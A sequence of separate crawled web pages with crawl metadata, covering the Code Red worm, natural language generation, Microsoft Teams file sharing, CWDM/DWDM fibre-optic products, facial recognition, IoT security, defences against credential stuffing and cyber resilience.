before reaching the White House website. Speculators had it that the hackers gave the Code Red name to the virus as a secret way to refer to China. However, reports from the U.S. said that the name was from an American soft drink. It is popular among computer programmers. China was on the front line of inquiry, as some infected machines displayed the words “Hacked by Chinese.” On the contrary, the wording could be a red herring to divert attention from the actual origin of the virus. According to a Chinese government spokesman, the country knew nothing about the worm. Microsoft later released a patch to fix the security hole. It also joined the FBI to encourage users to ensure their systems are safe against Code Red. Other viruses that have caused infinite damage over the years include: The financial impact of these viruses was enormous, but they are just the tip of the iceberg. Companies are at risk of being attacked by the more than 127 million new malware apps that hackers create annually. As such, cybersecurity measures are of paramount importance for all business operations. Computer viruses come in many forms today, including file infections, email viruses, Trojans, browser hijacks, adware, and macro viruses. They are unwelcome predators that put your business reputation at stake when they strike. They could also bring your business down, depending on the extent of the attack. Since you never know when such an attack could happen, it’s crucial to take protective measures. Experts recommend keeping all your systems and applications updated all the time. This helps in patching security holes that give way to an attack. Put measures in place to monitor emails, use firewalls, install antivirus, anti-ransomware, and anti-malware software, and encrypt your files and folders. You also must create cybersecurity awareness among your employees and customers, educating them on the risks and warning signs. Ensuring that you have comprehensive cybersecurity measures calls for professional input. Working with an IT service provider gives you better results than doing it all on your own. EB Solutions is one such company that customizes your IT solutions to meet your business needs. Contact us today, and let’s review your business IT systems and cybersecurity needs.
<urn:uuid:21b159b3-f9c1-496d-bdf2-32da0304c270>
CC-MAIN-2024-38
https://ebsolution.ca/the-top-3-worst-computer-viruses-in-history/
2024-09-18T01:34:18Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00624.warc.gz
en
0.973693
1,265
3.09375
3
- Like what you see? Lets Talk Natural language generation (NLG), a form of Generative AI, is an AI-driven technology that transforms structured data into human-like narratives. These narratives convey complex insights and serve as the foundation for the automated generation of various forms of content, including reports, articles, and summaries derived from intricate datasets. NLG transforms data into human-readable text, while natural language processing (NLP) focuses on extracting numerical data from textual sources. NLG streamlines the comprehension of numerical data by generating reader-friendly summaries, eliminating the need for extensive manual data analysis. In contrast, NLP reads and extracts critical numerical insights from human-written text, efficiently summarising research findings. In simple terms, NLG acts as a writer, while NLP functions as a reader in data interpretation. NLG operates through an intricately designed framework comprised of core components: At its genesis, NLG relies upon structured data, encompassing numerical values, chronological data, factual information, and assorted data points of relevance. NLG deploys advanced algorithms to process and analyse the underlying data meticulously. These algorithms unveil meaningful patterns and critical insights concealed within the dataset. NLG harnesses predefined templates and a structured set of rules to systematically shape the generated text. This meticulous structuring ensures textual consistency and readability. The language generation engine emerges as the central entity responsible for transmuting the insights derived from data into meticulously structured and coherent narratives. This transformation is achieved by applying linguistic rules and patterns, ensuring the final output retains the attributes of human-generated text. The practical applications of NLG span diverse domains: NLG brings unprecedented efficiency to reporting by autonomously generating comprehensive reports and concise summaries, alleviating the considerable time and manual labour typically associated with these tasks. NLG emerges as a transformative force within business intelligence, translating raw data into actionable insights that guide real-time decision-making processes. NLG seamlessly integrates with conversational interfaces, such as chatbots and virtual assistants, to provide context-aware and personalised customer support, substantially enhancing the quality of user interactions. The integration of NLG within an organisational framework furnishes an array of distinct advantages: NLG bridges the comprehension gap between complex data and actionable insights, expediting the decision-making process while minimising the risk of errors stemming from manual interpretation. The scalability of NLG is a prominent attribute that empowers organisations to effortlessly process voluminous datasets, extending the automation of report generation and content creation to a grand scale. One of the intrinsic virtues of NLG lies in its ability to ensure uniformity in reporting and messaging, mitigating the risk of human errors, inconsistencies, and omissions that often plague manually generated content. NLG, once confined to its origins in weather data interpretation, has evolved significantly. In today's dynamic landscape, NLG systems have demonstrated remarkable versatility, contributing to diverse applications: Gmail's smart compose feature, underpinned by NLG, offers users real-time text suggestions as they compose emails, streamlining and enhancing the email composition. Renowned entities like the Associated Press (AP) automatically harness Wordsmiths' capabilities to generate content, including earnings reports. This reduces the burden on human reporters and ensures that data-driven content reaches readers with unparalleled efficiency. Gpt-3, an advanced language prediction model, has emerged as a powerful asset for content generation. It excels in producing coherent blog posts, press releases, technical manuals, and data-driven narratives, often displaying impressive accuracy. This diverse skill set enables marketers to transform structured information into data-rich narratives. As exemplified by Apple's Siri and Amazon's Alexa, voice-activated digital assistants leverage NLG to provide concise and informative responses to user queries. The underpinning NLG technology ensures seamless interactions between users and these virtual assistants. NLG plays an instrumental role in shaping chatbot interactions. It empowers chatbots to comprehend user inputs and generate contextually relevant and coherent responses, elevating user engagement quality. The successful integration of NLG within an organisational framework necessitates a systematic approach: The selection of an NLG solution warrants a comprehensive assessment, encompassing compatibility with existing systems, scalability, and alignment with the overarching strategic objectives of the organisation. Seamless integration of NLG calls for a well-thought-out implementation plan, incorporating user training and adoption considerations. NLG systems utilise predefined templates and rules to structure and generate text. The NLG-driven process condenses information about specific events into concise summaries. Ongoing developments and AI technology improvements impact NLG system capabilities. Collaborative efforts between humans and NLG systems to enhance creativity and efficiency in content creation and data analysis. Find out more about how we can help your organization navigate its next. Let us know your areas of interest so that we can serve you better
<urn:uuid:aaef5bcb-abda-43e2-ae94-fa61fe7b2896>
CC-MAIN-2024-38
https://www.infosysbpm.com/glossary/natural-language-generation.html
2024-09-18T01:09:26Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.68/warc/CC-MAIN-20240918000844-20240918030844-00624.warc.gz
en
0.885299
1,013
3.109375
3
Written by: Jay H. Microsoft Teams is a powerful collaboration tool that allows teams to communicate, collaborate, and share files seamlessly. Let’s explore how to share files in Teams in chat, channels, and meetings, as well as how to work on files in Teams without leaving the app. Sharing Files in Chat Sharing files in chat is simple in Teams. To share a file, start by opening a chat with the person or group you want to share the file with. Next, click on the paperclip icon in the message box to attach a file. You can then select a file from your computer or OneDrive, or you can drag and drop a file directly into the chat window. Once you’ve attached the file, you can add a message to accompany it and click the send button to share it. The file will be uploaded to the chat and the recipient(s) will be able to download and view it. Sharing Files in Channels Channels are a great way to organize conversations and collaborate on specific topics. To share a file in a channel, start by navigating to the channel where you want to share the file. Next, click on the Files tab at the top of the channel to open the Files tab. From here, you can either upload a new file or select an existing file from the channel’s shared files. To upload a new file, click on the Upload button and select the file from your computer or OneDrive. To select an existing file, simply click on the file to open it. Once the file is uploaded or selected, you can add a message to accompany it and click the send button to share it with the channel members. The file will be added to the channel’s shared files and the members will be able to access it. Sharing Files in Meetings Meetings in Teams allow you to collaborate with your team members in real-time. To share a file in a meeting, start by joining the meeting and clicking on the Share content button in the meeting controls. Next, select the file you want to share from your computer or OneDrive. You can then choose to share your entire screen, a specific window, or just the file itself. Once you’ve selected the sharing option, click on the Share button to share the file with the meeting participants. The file will be displayed on the meeting screen and participants will be able to view it. Working on Files in Teams One of the great features of Teams is that you can work on files without leaving the app. To do this, simply click on the file you want to work on in a chat, channel, or meeting. The file will open in the Teams app and you’ll be able to edit it using the familiar Office tools. When you’re done editing the file, simply save it and it will be automatically updated in the chat, channel, or meeting. This makes collaborating on files in Teams seamless and efficient. In conclusion, sharing files in Teams is easy and efficient. Whether you’re sharing files in chat, channels, or meetings, or working on files without leaving the app, Teams has you covered. By using these features, you can collaborate with your team members more effectively and get work done faster. If you or your organization needs support for Microsoft Teams or other applications, please contact our professional technical support now for help. Comments are closed.
<urn:uuid:23fdc54c-39f8-40e0-ad13-8481f39e8efc>
CC-MAIN-2024-38
https://design2web.ca/blog/how-to-manage-and-send-files-in-microsoft-teams/
2024-09-12T01:20:31Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00324.warc.gz
en
0.928239
708
2.546875
3
In the field of telecommunications, data centre connectivity, video transport, fibre optic cabling is highly desirable for today’s communication needs due to the enormous bandwidth availability. As fibre cabling is sometimes expensive for people especially individuals to use, wavelength division multiplexing (WDM) is highly advisable for it can expand the capacity of fibres. This article will depict one kind of WDM: coarse wavelength division multiplexing (CWDM or Coarse WDM) which works efficiently with lower cost in short-haul networks in comparison with DWDM (Dense WDM). CWDM is a method of combining multiple signals on laser beams at various wavelengths for transmission along fibre optic cables. Compared to DWDM which is a more tightly packed WDM system, CWDM has larger channel spacing, having fewer wavelengths be transported on the same fibre. For instance, CWDM typically has channels at wavelengths spaced 20 nanometres (nm) apart, compared with 0.4 nm spacing for DWDM. DWDM can typically transmit from 32 to 128 channels by using erbium-doped fibre amplifiers to boost the signal over long distances, which makes it ideal for long-haul networks. In contrast, CWDM can only transmit a maximum of 18 channels with large spacing between channels, making optical amplifiers not able to be used in CWDM system. So CWDM is typically deployed at short-haul networks. Cost Comparison of WDM Technologies Due to its broader channel spacing, CWDM has a cost advantage over DWDM. CWDM systems spread less precise lasers over a larger range of wavelengths with consuming less power with low losses. For example, both DWDM and CWDM utilise Distributed Feedback Lasers (DFB). However, DWDM requires the larger cooled DFB lasers because laser wavelengths drift about 0.08 nm/°C with temperature. CWDM uses DFB lasers that are not cooled because laser wavelengths drift about 6nm over the range of 0-70°C and the lasers’ tolerance (extent of wavelength imprecision or variability) in a CWDM is up to ±3 nm. The use of uncooled lasers causes lower power consume, which has positive financial implications for systems operators. For instance, the cost of battery is minimized with the decreasing of power consume, which reducing operating costs. It is concluded that CWDM is the technology of choice for cost efficiently transporting data traffic in short-haul networks. And as the demand for bandwidth is pushed to the edge of the network, the need for low-cost transport systems is imperative. FS offers a wide range of CWDM products such as CWDM MUX DEMUX with low cost, CWDM OADM with various configurations, CWDM Transceivers (SFP, SFP+, XFP, GBIC, X2, XENPAK) supporting 155Mbps to 10Gbps data transmissions, etc. Compatible CDWM transceivers are strongly recommended for you. There are CWDM transceivers of famous brands such as Cisco, HP, Juniper, etc. All these CWDM transceivers are of high quality and capacity to be applied to transport data traffic with low cost. For more information, you can visit FS online shop. The passive WDM network building block aggregates wavelengths of light from several transmitter sources, and transmits the combined these source light into one fibre. Each wavelength of light remains unchanged and transparent in the presence of neighboring wavelengths. An optical prism represents a convenient way to understand a MUX/DEMUX function. When a multi-color light beam goes through an optical prism, due to its unique material property and geometry, light of different colors will exit at different angles,and become, in WDM terminology, de-multiplexed. Conversely, and become, in WDM terminology, demultiplexed. Conversely, designated angles, they will exit the prism at the same angle as a single light beam becoming, in WDM terminology, multiplexed. CWDM MUX and DEMUX The passive CWDM MUX building block can aggregates wavelengths of light from several transmitter sources(TX) and transmits the combined linght into one fibre. Eash wavelength of light remains unchanged and transparent in the presence of neighboring wavelengths. Typically, CWDM MUX and DEMUXE modules are designed with a minumum of 4 channels to a maximum of 16 channels. CWDM Optical Add & Drop is the ideal solution for the increasing bandwidth demand on enterprise and metro access networks. ESCON, ATM, Fibre Channel, Gigabit-Ethernet are supported simultaneously, without disturbing each other. OADM is illustrated in a protedted ring system. OADMs provide access to a singel or even more wavelengths of a wavelength-multiplexed system increasing the possibility of networking. Although this greatly improves the flexibility for CWDM, the insertion loss of these devices poses a challenge on the design of rings as CWDM uses no optical amplitication to overcome losses. DWDM MUX and DEMUX In general, a CWDM (coarse WDM) MUX/DEMUX deals with small numbers of wavelengths, typically eight, but with large spans between wavelengths (spaced typically at around 20nm). A DWDM (dense WDM) MUX/DEMUX deals with narrower wavelength spans (as small as 0.8nm, 0.4nm or even 0.2nm), and can accommodate 40, 80, or even 160 wavelengths. The 100 GHz DWDM OADM is configurable as both an OADM and a terminal multiplexer and demultiplexer (MUX/DEMUX) to support a broad range of architectures ranging from scalable point-to-point links to four-fibre protected rings. The FS 100 GHz Optical Add/Drop Modules (OADM) offer a family of flexible, low-cost solutions to enable capacity expansion of existing fibre. FS 100GHz DWDM Optical Add/Drop (OADM) is designed to optically add/drop one or multiple DWDM channels into one or two fibres. The compact transceivers are particularly uesful when operating on bidirectional linkes since each site comprises a transmitter as well as receiver, laser, receiver diode, and relevant electronices for driving the laser and shaping the received signal are integrated in a small form factor module with a standardized interface. CWDM transceivers typically use directly modulated DFB lasers oprating at 2.5Gb/s and PIN receivers with a receiver module and decision circuit. The modulated output power ranges from 0 to 3 dBm, although it could be reduced at elevated temperatures since to activer cooling of the devices is avalible due to lower-cost design. The (PIN) receiver sensitivity of the transceivers is around to lower-cost design. The (PIN) receiver sensitivity of the transceivers is around-24…26dB so that a link budget of at least 24 dB should be available, which can be used to accommodate both the insertion loss of components (multiplexer fibre) as well as penalties due to the interaction of fibre dispersion and laser chirp. At lower bit-rates, the link budget is increasing up to 32dB at 1.25Gb/s. FS wdm transceivers with embedded transmitter and receiver functions in a single packaged module. With different grades of performance,and have been integrated into WDM networks for point to point links, metro and core networks and storage area networks (SAN) applications such as data-centre mirroring. FS supply 1.25Gbps (Gigabit) rate, 2.5Gbps rate, 4G rate and 10G rate CWDM & DWDM transceiver modules which enables use of CWDM/DWDM solutions for uncontrolled environment applications. CWDM transceivers can operate on 9/125um single-mode fibre to 40km or 80km by using special CWDM channels (1270nm to 1610nm, in steps of 20nm). Likewise, DWDM transceivers can supports a link length of up to 40km or 80km on single-mode fibre by using special DWDM channels ( 100GHz ITU Grid CH17 to CH61). All CWDM and DWDM transceivers from FS support DDM (Digital Diagnostic Management), and they are compliant with the Multi-Source Agreement (MSA) ensuring compatibility with a wide range of fibre optic networking equipment. sfp tansceiver xfp transceiver Other Building Blocks on FS 1G 2G 4G 10G Transponders ( OEO) Transponders are usually used in some applications that the link length is much longer than what the power budget defines or there is not a clear line of sight between the two end nodes. OEO means optical-to-electrical-to-optical. It is one type of transponders. OEO converts optical signal to electrical signal and then to optical signal again. It allows for add-drop functionality, in addition to simple optical reply or transponder. FS supply 1G, 2G and 4G OEO, 125M~4.25G OEO Converter, 125M~1.25G OEO Converter, such as SFP to SFP Optical-Electrical-Optical type media converter / repeater to meet your different requirement. 10G OEO converter is used in Telecommunication room, R&D laboratory, Data centre or even 1310nm /1550nm/CWDM/DWDM Optical Wavelength Conversion. It supports multi-protocol 10G data rates including SDH/SONET STM-64/OC-192, 10G Ethernet, or 10G Fibre Channel. FS supply high quality 10G Transponder, such as XFP-XFP or SFP+ to XFP or SFP+ to SFP+ Optical-Electrical-Optical type media converter / repeater. They are for connection between fibre to fibre 10Gbps equipment function as fibre mode converter/repeater for long distance transmission. For a complete listing of FS WDM products, refer to the latest guide on www.fs.com or contact us at firstname.lastname@example.org.
<urn:uuid:bc343965-edbc-4a0e-8659-f168a5e4dac1>
CC-MAIN-2024-38
https://www.fiber-optic-equipment.com/tag/cwdm-oadm
2024-09-12T03:10:31Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00324.warc.gz
en
0.924412
2,174
3.421875
3
When you post a photo on Facebook, and the platform automatically tags the people in the image, you might not give much thought to the technology behind the convenience. However, when you discover that facial recognition technology could track you without your permission while you walk down a street in London, it might make you question the invasion of your privacy. Just like with any other new technology, facial recognition brings positives and negatives with it. Since it’s here to stay and expanding, it’s good to be aware of the pros and cons of facial recognition. What is facial recognition, and how does it work? Facial recognition is a biometric technology that uses distinguishable facial features to identify a person. Allied Market Research expects the facial recognition market to grow to $9.6 billion by 2022. Today, it’s used in a variety of ways from allowing you to unlock your phone, go through security at the airport, purchase products at stores and in the case of entertainer and musician Taylor Swift it was used to identify if her known stalkers came through the gate at her Rose Bowl concert in May 2018. Today, we are inundated with data of all kinds, but the plethora of photo and video data available provides the dataset required to make facial recognition technology work. Facial recognition systems analyse the visual data and millions of images and videos created by high-quality Closed-Circuit Television (CCTV) cameras installed in our cities for security, smartphones, social media, and other online activity. Machine learning and artificial intelligence capabilities in the software map distinguishable facial features mathematically, look for patterns in the visual data, and compare new images and videos to other data stored in facial recognition databases to determine identity. Pros of facial recognition One of the major advantages of facial recognition technology is safety and security. Law enforcement agencies use the technology to uncover criminals or to find missing children or seniors. In New York, police were able to apprehend an accused rapist using facial recognition technology within 24 hours of an incident where he threatened a woman with rape at knifepoint. In cities where police don’t have time to help fight petty crime, business owners are installing facial-recognition systems to watch people and identify subjects of interest when they come in their stores. Airports are increasingly adding facial recognition technology to security checkpoints; the U.S. Department of Homeland Security predicts that it will be used on 97 percent of travellers by 2023. When people know they are being watched, they are less likely to commit crimes so the possibility of facial recognition technology being used could deter crime. Since there is no contact required for facial recognition like there is with fingerprinting or other security measures, facial recognition offers a quick, automatic, and seamless verification experience. There is nothing such as a key or I.D. That can be lost or stolen. Facial recognition can add conveniences. In addition to helping you tag photos in Facebook or your cloud storage via Apple and Google, you will start to be able to cheque-out at stores without pulling out money or credit cards—your face will be scanned. At the A.I. Bar, facial recognition technology is used to add patrons who approach the bar to a running queue to get served their drinks more efficiently. Although possible, it’s hard to fool facial recognition technology so it can also help prevent fraud. Cons of facial recognition The biggest drawback for facial recognition technology in most people’s opinions is the threat to an individual’s privacy. In fact, several cities have considered or will ban real-time facial recognition surveillance use by law enforcement, including San Francisco, Cambridge, Massachusetts, and more. These municipalities determined the risks of using the technology outweighed the benefits. Police can still use footage from personally owned devices such as Nest cameras to find criminals; it’s just not allowing the government entities to use live facial recognition software. While London’s King’s Cross is using facial recognition, London is also at the forefront of democratic societies in its testing of the technology. In test events, the city hopes to determine the accuracy of the systems while grappling with how to deal with individuals who cover up to hide their identity from cameras and other issues. Additionally, democratic societies must define the legal basis to live facial-recognition of the general population, and when blanket use of the technology is justified. The technology isn’t as effective at identifying people of colour and women as it is white males. One reason for this is the data set the algorithms are trained on is not as robust for people of colour and women. Until this is rectified, there are concerns about the ramifications for misidentifying people with the technology. In addition, there are issues that need to be resolved that can throw off the technology when a person changes appearance or the camera angle isn’t quite right (although they are working on being able to identify a person by only their earlobe). It’s dramatically improving; according to independent tests by the U.S. National Institute of Standards and Technology (NIST) facial recognition systems got 20 times better at finding a match in a database over a period that covered 2014 to 2018. Another potential downside is the storage of sensitive personal data and the challenges that come with it. Just last week, we have had the news that a database containing facial scans used by banks, police forces, and defence firms where breached. In order to benefit from the positive aspects of facial recognition, our society is going to have to work through some significant challenges to our privacy and civil liberties. Will individuals accept the invasion of their privacy as a proper cost to being more secure and for the conveniences facial recognition provides?
<urn:uuid:c5d62fcb-71f6-4bca-8060-643e20ba71be>
CC-MAIN-2024-38
https://bernardmarr.com/facial-recognition-technology-here-are-the-important-pros-and-cons/
2024-09-16T22:44:00Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651714.51/warc/CC-MAIN-20240916212424-20240917002424-00824.warc.gz
en
0.946828
1,169
2.703125
3
Security is a hugely important issue for the Internet of Things (IoT). And, according to experts, a lot of work remains to be done. Julie Knudson, writing at Enterprise Networking Planet, puts the situation in stark terms. She writes that not only are there no universal standards, but that even within individual categories – such as sensors, for instance – manufacturers have taken a proprietary approach to security. This is a yellow flag because it will make it more difficult to universally deploy a specific approach to security once it is decided upon. The bottom line: This is scary stuff. The problems of a lack of security became pretty clear earlier this month when a hacker claimed that he could take control of a commercial airplane. Other stories – for instance, hacking into a car and disabling the brakes – show the extent of the risks. Something as simple as de-synchronizing lights on Internet of Things control traffic control networks could wreak havoc. David Navetta and Seth Jaffe, analysts writing on the Norton, Rose, Fulbright Blog Network, noted that implementing IoT security poses particular problems and challenges for a couple of reasons. Commonalities in design enable one type of hack to be used to compromise many different types of devices. Added to this is the fact that the inexpensive nature of most devices dis-incentivizes patching. That dynamic will keep vulnerable devices in the field well past the time that a fix is available. The good news, at least according to Debra Donston-Miller at CIO, is that the challenge – though it is intimidating – is not insurmountable. The first step is for IT departments to approach things with a healthy dose of skepticism and to not assume that a particular IoT-networked connection is secure. Now more than ever it is imperative to have a data security policy in place, especially with the rise of IoT. For one thing, the collective size of the Internet-of-Things industry means that it will be deeply enmeshed in just about every crevice of everyday life. Many of these will be of marginal importance: Nobody is going to hack somebody’s alarm clock to change the radio station. However, many – from the power grid to health care – will be life and death matters. On top of that, the fact that there will be such a pervasive layer of things that need to be secure that implementing it after deployment will be a challenging, even if approaches are agreed upon. It is clear that vehicles are one of the places that the Internet of Things is particularly common and one in which is various implementations – from essentially frivolous entertainment to vital safety – come together. Thus, a vehicle is a good place to look to see where this is going. Alexandre Palus, the automotive architecture and enablement manager at Freescale, suggests steps in facilitating IoT security in vehicles. He suggests implanting security at every level – from chip to finished product -- and keeping an especially close eye on the human element. He also advises the industry to continue working on standards and to aim for those with a long lifespan. Designers should be educated on security issues. There seem to be some common sense steps that organizations can take at this point. Before diving deeply into I-o-T deployments, the company’s IT department should sit down with the potential vendors and have a deep discussion about security. How are the devices secured today? How in the connection between the sensor or other IOT-enabled element and the data collection point secured? What organizations and consortiums is the vendor involved in? Are the products architected in such a way that security can be seamlessly integrated once standards emerge?
<urn:uuid:f9274b91-b1fd-4b73-825a-5e877517042f>
CC-MAIN-2024-38
https://info.hummingbirdnetworks.com/blog/industry-must-pay-attention-to-iot-security
2024-09-18T04:21:53Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651836.76/warc/CC-MAIN-20240918032902-20240918062902-00724.warc.gz
en
0.950167
745
2.6875
3
Sign up to our Newsletter Credential stuffing is a type of cyberattack where stolen account credentials typically consisting of lists of usernames and/or email addresses and the corresponding passwords (often from a data breach) are used to gain unauthorized access to user accounts through large-scale automated login requests directed against a web application. According to OWASP, credential stuffing is the automated injection of breached username/password pairs in order to fraudulently gain access to user accounts. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account, which the attacker can then hijack for their own purposes. How One AI-Driven Media Platform Cut EBS Costs for AWS ASGs by 48% Unlike credential cracking, credential stuffing attacks do not attempt to brute force or guess any passwords – the attacker simply automates the logins for thousands to millions of previously discovered credential pairs using standard web automation tools like Selenium, cURL, PhantomJS or tools designed specifically for these types of attacks such as: Sentry MBA, SNIPR, STORM, Blackbullet and Openbullet. Credential stuffing attacks are possible because many users reuse the same username/password combination across multiple sites, with one survey reporting that 81% of users have reused a password across two or more sites and 25% of users use the same password across a majority of their accounts. How credential stuffing attacks work Credential stuffing is a cyberattack in which credentials obtained from a data breach on one service are used to attempt to log in to another unrelated service. Credential stuffing attacks are launched through botnets and automated tools that support the use of proxies that distribute the rogue requests across different IP addresses. Furthermore, attackers often configure their tools to mimic legitimate user agents — the headers that identify the browsers and operating systems web request are made from. Over a 17-month period, from November 2017 through the end of March 2019, security and content delivery company Akamai detected 55 billion credential stuffing attacks across dozens of verticals. While some industries were more heavily targeted than others — for example gaming, retail and media streaming — no industry was immune. The Ponemon Institute’s Cost of Credential Stuffing report found that businesses lose an average of $4 million per year to credential stuffing. These losses take the form of application downtime, lost customers, and increased IT costs. Large-scale botnet attacks can overwhelm a business’ IT infrastructure, with websites experiencing as much as 180 times their typical traffic during an attack. And despite the uptick in reported attacks, it’s safe to assume that many businesses do not disclose when their systems are compromised, and their internal data is stolen, so we may never know the full cost. Detecting and preventing credential stuffing attacks There are multiple ways to try to detect a credential stuffing attack. - Monitor for abnormal amount of login attempts to an account from a single endpoint. - Monitor access attempts to multiple accounts from a single endpoint. - Detecting known malicious endpoints attempting to use the credential via their IP address or fingerprinting techniques. - Detecting the use of automation software in the login process. - Remove credentials based login and replace with passwordless authentication. How users can protect themselves Here are some recommendations for individual users about how they can protect themselves: - Avoid reusing passwords: Use a unique password for each account you use online. That way, even if your password leaks, it can’t be used to sign in to other websites. Attackers can try to stuff your credentials into other login forms, but they won’t work. - Use a password manager: Remembering strong unique passwords is a nearly impossible task if you have accounts on quite a few websites, and almost everyone does. We recommend using a password manager like 1Password (paid) or Bitwarden (free and open-source) to remember your passwords for you. It can even generate those strong passwords from scratch. - Enable two-factor authentication: With two-step authentication, you have to provide something else—like a code generated by an app or sent to you via SMS—each time you log in to a website. Even if an attacker has your username and password, they won’t be able to sign in to your account if they don’t have that code. - Get leaked password notifications: With a service like Have I Been Pwned?, you can get a notification when your credentials appear in a leak. How companies can protect themselves against credential stuffing Use multi-factor authentication Multi-factor authentication (MFA) is by far the best defense against the majority of password-related attacks, including credential stuffing and password spraying. As such, it should be implemented wherever possible; however, depending on the audience of the application, it may not be practical or feasible to enforce the use of MFA. Attackers will typically have a limited pool of IP addresses, so another effective defense is to block or sandbox IPs that attempt to log into multiple accounts. You can monitor the last several IPs that were used to log into a specific account and compare them to the suspected bad IP, to reduce false positives. Flag unrecognized devices Requiring a user to solve a CAPTCHA for each login attempt can help to prevent automated login attempts, which would significantly slow down a credential stuffing or password spraying attack. However, CAPTCHAs are not perfect, and in many cases tools exist that can be used to break them with a reasonably high success rate. To improve usability, it may be desirable to only require the user solve a CAPTCHA when the login request is considered suspicious. Align Website Architecture with Different Types of Clients If achieving the smallest possible attack surface is your goal, then the ideal solution has to align the website architecture with different types of clients. Some organizations have already done this to varying degrees. Others may need to rearchitect their website in order to do so. Breaking existing endpoints into separate URLs helps reduce the attack surface by providing the most granular control of transactional URL traffic. For example, you might segment your clients by URL as follows: - URL 1: Humans on desktop, laptop, and mobile browsers - URL 2: Native mobile apps - URL 3: Automated third-party services, such as industry aggregators and partners With this approach, you will be able to apply the appropriate bot detection to URL 1 and URL 2, and force other types of consumers to URL 3. While you can’t use behavioral anomaly bot detection to protect URL 3, you can control the data and application features available to its users. Credential stuffing attacks pose a significant cyber threat not only for individuals, but also for companies. If you have any questions about how we can help you protect your website and business from cyber-attacks, contact us today to help you out with your performance and security needs.
<urn:uuid:a8499b8b-5425-4579-8cad-734dd0e1e627>
CC-MAIN-2024-38
https://www.globaldots.com/resources/blog/what-is-credential-stuffing/
2024-09-09T18:52:14Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651133.92/warc/CC-MAIN-20240909170505-20240909200505-00624.warc.gz
en
0.93048
1,447
3.046875
3
With the growing frequency and sophistication of cyberattacks, cybersecurity leaders are on high alert to implement and maintain an effective and sound cybersecurity program. Cyber risks and the challenges of ensuring robust cyber health are further exacerbated as the digital interconnectivity of people, processes, and organizations continues to intensify. Cyberattacks are growing at an alarming rate and do not show any signs of slowing down. Attacks on web applications alone surged by a whopping 800% in the first half of 2020, according to a report by CDNetworks. The Center for Strategic & International Studies (CSIS) estimates that cybercrime costs the world nearly $600 billion every year. Furthermore, private sector companies are expected to lose $5.2 trillion in revenue to cybersecurity attacks over the course of five years, from 2019 to 2023, as per a report from Accenture. It is important to note here that organizations are often not the victims of a targeted attack, such as hacks, DDoS (Distributed Denial-of-Service) attacks, and others. Untargeted attacks, such as those carried out via malware (worms, spyware, adware, computer viruses, etc.), phishing emails, etc., are not directed towards any specific person or business and are more common. These attacks indiscriminately infect devices, casting a net as wide as possible. According to CSO Online, phishing attacks account for over 80% of reported security incidents. Today, organizations simply cannot assume that they can have an impenetrable cyber defense mechanism. As such, the global narrative has been gradually shifting from cybersecurity to cyber resilience in recent years—focusing on not just averting cyber breaches but also designing a strategy to minimize impact and potential loss and ensuring continued business operations during the attacks. As cybercrime incidents continue to proliferate across the globe, achieving cyber certainty seems to be a pipe dream for companies. Achieving cyber resilience, however, is not only a realistic goal but also indispensable for businesses to thrive in this digital era. Embarking on the path to achieve cyber resilience starts with the identification of the cyber threats that an organization is exposed to (such as ransomware, malware, phishing attacks, etc.), prioritizing the risks depending on the impact and probability of them occurring, and devising an effective response plan. In today’s digitized world, checking an organization’s cyber health has become an iterative process requiring continuous monitoring of business processes and IT infrastructure for identifying and addressing any vulnerable areas or loopholes. Achieving the state of sound cyber resilience could be a daunting proposition for any organization. It has been noted that quite often organizations put more reliance on tools and techniques for building cyber resilience capabilities rather than the expertise of people and well-designed processes. The best practice is to find the right mix of people, processes, and technology while devising the cyber resilience management framework. A cyber resilience framework is a structured approach that helps organizations proactively prepare for, effectively respond to, and swiftly recover from cyberattacks. It provides a comprehensive strategy to manage cyber risks. An effective cyber resilience management program also requires integrating cybersecurity into business strategy and engaging the entire spectrum of stakeholders in the process for better decision-making. MetricStream is helping organizations achieve cyber resilience in a simplified and streamlined manner, saving time, effort, and resources. With the MetricStream CyberSecurity Solution, organizations can proactively anticipate and mitigate IT and cyber risks, threats, vulnerabilities; have a 360-degree, real-time view of IT risk, compliance, policy management, and IT vendor posture; and implement an effective business continuity and disaster recovery program. International standard-setting bodies and national-level regulatory bodies are regularly publishing policies, guidelines, best practices, and more to help organizations prevent or mitigate cyberattacks. The International Organization for Standardization (ISO), an international standard-setting body composed of representatives from various national standards organizations, has published ISO/IEC 27001 which provides requirements for an information security management system (ISMS). There is also the ISA/IEC 62443 series of standards, developed by the ISA99 committee, which provides a framework to address and mitigate existing and future security vulnerabilities in industrial automation and control systems (IACSs). In addition to these global standards, there are various national standards such as the NIST Cybersecurity Framework, Cybersecurity Maturity Model Certification (CMMC) in the United States, Cyber Essentials in the United Kingdom, and the BSI IT Baseline Protection Catalogs in Germany, among others, which are intended to strengthen the cyber resilience of organizations operating in these countries. Governments have also put into effect various cybersecurity regulations that govern the cybersecurity measures implemented by organizations. In the U.S. for example, healthcare organizations have to comply with the Health Insurance Portability and Accountability Act (HIPAA) while financial institutions have to adhere to the Gramm-Leach-Bliley Act. Organizations in the European Union have to adhere to the Network Information Security Directive, EBA ICT guidelines, the General Data Protection Regulation (GDPR), and other such regulations. In 2020, the World Economic Forum created the Partnership against Cybercrime initiative that aims to explore ways to support and strengthen public-private cooperation against cybercrime and overcome existing barriers to cooperation. Such initiatives are particularly important for reinforcing the fight against cybercrime by businesses and regulators alike. The lack of a mature cyber resilience program and the resulting inability to thwart cyberattacks or minimize their impact can not only lead to regulatory fines and penalties but also reputational damage, loss of customer trust, and even threaten the very existence of a company. Public-private collaborative efforts to fight cybercrime, bringing together their respective strengths, capabilities, and resources, could go a long way to control the growing menace of cybercrime. To learn more about cyber resilience read MetricStream’s eBook, A Shift from Cybersecurity to Cyber Resilience, which delves into the growing focus on cyber resilience management, the importance of cyber risk quantification, and provides quick tips on cyber resilience best practices and how to combat cyberattacks effectively with a cybersecurity incident response program.
